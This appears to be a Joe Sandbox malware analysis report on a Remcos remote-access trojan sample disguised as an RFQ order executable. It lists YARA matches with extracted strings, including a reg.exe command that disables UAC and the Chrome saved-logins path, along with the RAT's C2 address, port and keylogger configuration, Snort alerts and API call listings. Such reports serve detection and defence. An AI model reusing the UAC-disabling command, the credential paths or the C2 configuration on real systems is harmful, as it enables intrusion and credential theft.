8.2.mobsync.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x606bc:$str_a1: C:\Windows\System32\cmd.exe 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f86c:$str_b2: Executing file: 0x60800:$str_b3: GetDirectListeningPort 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x603d4:$str_b5: licence_code.txt 0x60278:$str_b7: \update.vbs 0x5f8dc:$str_b9: Downloaded file: 0x5f8a8:$str_b10: Downloading file: 0x5f890:$str_b12: Failed to upload file: 0x607c8:$str_b13: StartForward 0x607e8:$str_b14: StopForward 0x60220:$str_b15: fso.DeleteFile " 0x601b4:$str_b16: On Error Resume Next 0x60250:$str_b17: fso.DeleteFolder " 0x5f880:$str_b18: Uploaded file: 0x5f91c:$str_b19: Unable to delete: 0x601e8:$str_b20: while fso.FileExists("
18.2.dialer.exe.10590000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
18.2.dialer.exe.10590000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x60553:$str_a1: C:\Windows\System32\cmd.exe 0x604cf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x604cf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5facf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60127:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f703:$str_b2: Executing file: 0x60697:$str_b3: GetDirectListeningPort 0x5fee7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6026b:$str_b5: licence_code.txt 0x6010f:$str_b7: \update.vbs 0x5f773:$str_b9: Downloaded file: 0x5f73f:$str_b10: Downloading file: 0x5f727:$str_b12: Failed to upload file: 0x6065f:$str_b13: StartForward 0x6067f:$str_b14: StopForward 0x600b7:$str_b15: fso.DeleteFile " 0x6004b:$str_b16: On Error Resume Next 0x600e7:$str_b17: fso.DeleteFolder " 0x5f717:$str_b18: Uploaded file: 0x5f7b3:$str_b19: Unable to delete: 0x6007f:$str_b20: while fso.FileExists("
18.2.dialer.exe.10591897.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
18.2.dialer.exe.10591897.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x5d2bc:$str_a1: C:\Windows\System32\cmd.exe 0x5d238:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5d238:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5c838:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5ce90:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5c46c:$str_b2: Executing file: 0x5d400:$str_b3: GetDirectListeningPort 0x5cc50:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5cfd4:$str_b5: licence_code.txt 0x5ce78:$str_b7: \update.vbs 0x5c4dc:$str_b9: Downloaded file: 0x5c4a8:$str_b10: Downloading file: 0x5c490:$str_b12: Failed to upload file: 0x5d3c8:$str_b13: StartForward 0x5d3e8:$str_b14: StopForward 0x5ce20:$str_b15: fso.DeleteFile " 0x5cdb4:$str_b16: On Error Resume Next 0x5ce50:$str_b17: fso.DeleteFolder " 0x5c480:$str_b18: Uploaded file: 0x5c51c:$str_b19: Unable to delete: 0x5cde8:$str_b20: while fso.FileExists("
18.2.dialer.exe.10591897.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
18.2.dialer.exe.10591897.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5ecbc:$str_a1: C:\Windows\System32\cmd.exe 0x5ec38:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec38:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e238:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5e890:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5de6c:$str_b2: Executing file: 0x5ee00:$str_b3: GetDirectListeningPort 0x5e650:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5e9d4:$str_b5: licence_code.txt 0x5e878:$str_b7: \update.vbs 0x5dedc:$str_b9: Downloaded file: 0x5dea8:$str_b10: Downloading file: 0x5de90:$str_b12: Failed to upload file: 0x5edc8:$str_b13: StartForward 0x5ede8:$str_b14: StopForward 0x5e820:$str_b15: fso.DeleteFile " 0x5e7b4:$str_b16: On Error Resume Next 0x5e850:$str_b17: fso.DeleteFolder " 0x5de80:$str_b18: Uploaded file: 0x5df1c:$str_b19: Unable to delete: 0x5e7e8:$str_b20: while fso.FileExists("
18.2.dialer.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
18.2.dialer.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x606bc:$str_a1: C:\Windows\System32\cmd.exe 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f86c:$str_b2: Executing file: 0x60800:$str_b3: GetDirectListeningPort 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x603d4:$str_b5: licence_code.txt 0x60278:$str_b7: \update.vbs 0x5f8dc:$str_b9: Downloaded file: 0x5f8a8:$str_b10: Downloading file: 0x5f890:$str_b12: Failed to upload file: 0x607c8:$str_b13: StartForward 0x607e8:$str_b14: StopForward 0x60220:$str_b15: fso.DeleteFile " 0x601b4:$str_b16: On Error Resume Next 0x60250:$str_b17: fso.DeleteFolder " 0x5f880:$str_b18: Uploaded file: 0x5f91c:$str_b19: Unable to delete: 0x601e8:$str_b20: while fso.FileExists("
18.2.dialer.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
18.2.dialer.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5ecbc:$str_a1: C:\Windows\System32\cmd.exe 0x5ec38:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec38:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e238:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5e890:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5de6c:$str_b2: Executing file: 0x5ee00:$str_b3: GetDirectListeningPort 0x5e650:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5e9d4:$str_b5: licence_code.txt 0x5e878:$str_b7: \update.vbs 0x5dedc:$str_b9: Downloaded file: 0x5dea8:$str_b10: Downloading file: 0x5de90:$str_b12: Failed to upload file: 0x5edc8:$str_b13: StartForward 0x5ede8:$str_b14: StopForward 0x5e820:$str_b15: fso.DeleteFile " 0x5e7b4:$str_b16: On Error Resume Next 0x5e850:$str_b17: fso.DeleteFolder " 0x5de80:$str_b18: Uploaded file: 0x5df1c:$str_b19: Unable to delete: 0x5e7e8:$str_b20: while fso.FileExists("
19.2.secinit.exe.10590000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.secinit.exe.10590000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f953:$str_a1: C:\Windows\System32\cmd.exe 0x5f8cf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f8cf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5eecf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f527:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5eb03:$str_b2: Executing file: 0x5fa97:$str_b3: GetDirectListeningPort 0x5f2e7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f66b:$str_b5: licence_code.txt 0x5f50f:$str_b7: \update.vbs 0x5eb73:$str_b9: Downloaded file: 0x5eb3f:$str_b10: Downloading file: 0x5eb27:$str_b12: Failed to upload file: 0x5fa5f:$str_b13: StartForward 0x5fa7f:$str_b14: StopForward 0x5f4b7:$str_b15: fso.DeleteFile " 0x5f44b:$str_b16: On Error Resume Next 0x5f4e7:$str_b17: fso.DeleteFolder " 0x5eb17:$str_b18: Uploaded file: 0x5ebb3:$str_b19: Unable to delete: 0x5f47f:$str_b20: while fso.FileExists("
8.2.mobsync.exe.10591897.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.mobsync.exe.10591897.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x5d2bc:$str_a1: C:\Windows\System32\cmd.exe 0x5d238:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5d238:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5c838:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5ce90:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5c46c:$str_b2: Executing file: 0x5d400:$str_b3: GetDirectListeningPort 0x5cc50:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5cfd4:$str_b5: licence_code.txt 0x5ce78:$str_b7: \update.vbs 0x5c4dc:$str_b9: Downloaded file: 0x5c4a8:$str_b10: Downloading file: 0x5c490:$str_b12: Failed to upload file: 0x5d3c8:$str_b13: StartForward 0x5d3e8:$str_b14: StopForward 0x5ce20:$str_b15: fso.DeleteFile " 0x5cdb4:$str_b16: On Error Resume Next 0x5ce50:$str_b17: fso.DeleteFolder " 0x5c480:$str_b18: Uploaded file: 0x5c51c:$str_b19: Unable to delete: 0x5cde8:$str_b20: while fso.FileExists("
Click to see the 31 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000008.00000002.492585881.00000000030E7000.00000004.00000020.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "204.44.86.179:49151:0123qwegus.duckdns.org:49151:0", "Assigned name": "septttt", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-ZXIQGD", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 8.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10591897.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10591897.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10591897.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10591897.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10591897.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10591897.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.492585881.00000000030E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331608026.0000000002F98000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356991304.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356879289.00000000006E8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492970715.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331771013.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mobsync.exe PID: 4692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dialer.exe PID: 6544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: secinit.exe PID: 6672, type: MEMORYSTR

Source: 8.0.mobsync.exe.10590000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.2.dialer.exe.10590000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.0.mobsync.exe.10590000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.mobsync.exe.10590000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 18.0.dialer.exe.10590000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.secinit.exe.10590000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.secinit.exe.10590000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.secinit.exe.10590000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.dialer.exe.10590000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.mobsync.exe.10590000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.dialer.exe.10590000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.mobsync.exe.10590000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.dialer.exe.10590000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.2.secinit.exe.10590000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 19.0.secinit.exe.10590000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: mobsync.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49708 version: TLS 1.2

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	8_2_004170AC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_00406176 FindFirstFileW,FindNextFileW,	8_2_00406176
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_0040A3AF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_0040A5CA
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004456A9 FindFirstFileExA,	8_2_004456A9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_004077EE
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	18_2_004170AC
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_00406176 FindFirstFileW,FindNextFileW,	18_2_00406176
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	18_2_0040A3AF
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	18_2_0040A5CA
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004456A9 FindFirstFileExA,	18_2_004456A9
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	18_2_004077EE
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_00407C57 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	18_2_00407C57

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

8_2_00406930

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remocs 3.x Unencrypted Checkin 192.168.2.5:49707 -> 204.44.86.179:49151
Source: Traffic	Snort IDS: 2032777 ET TROJAN Remocs 3.x Unencrypted Server Response 204.44.86.179:49151 -> 192.168.2.5:49707

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: 204.44.86.179

Source: Joe Sandbox View

ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 204.44.86.179:49151

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	TCP traffic detected without corresponding DNS query: 204.44.86.179
Source: unknown	TCP traffic detected without corresponding DNS query: 204.44.86.179
Source: unknown	TCP traffic detected without corresponding DNS query: 204.44.86.179
Source: unknown	TCP traffic detected without corresponding DNS query: 204.44.86.179
Source: unknown	TCP traffic detected without corresponding DNS query: 204.44.86.179
Source: unknown	TCP traffic detected without corresponding DNS query: 204.44.86.179
Source: unknown	TCP traffic detected without corresponding DNS query: 204.44.86.179

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_0041242F Sleep,URLDownloadToFileW,

8_2_0041242F

Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49708 version: TLS 1.2

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_004126A5 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_004126A5

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_004089BC GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

8_2_004089BC

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_004126A5 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_004126A5

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 8.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10591897.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10591897.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10591897.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10591897.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.10591897.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dialer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.secinit.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mobsync.exe.10591897.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.492585881.00000000030E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331608026.0000000002F98000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356991304.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.356879289.00000000006E8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492970715.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.331771013.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mobsync.exe PID: 4692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dialer.exe PID: 6544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: secinit.exe PID: 6672, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 8.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.dialer.exe.10590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.mobsync.exe.10591897.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.secinit.exe.10590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.secinit.exe.500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.secinit.exe.10591897.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.secinit.exe.10591897.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.secinit.exe.500000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.dialer.exe.10590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.dialer.exe.10591897.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.dialer.exe.10591897.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.dialer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.dialer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.secinit.exe.10590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.mobsync.exe.10591897.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.356991304.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.492970715.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000012.00000002.331771013.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

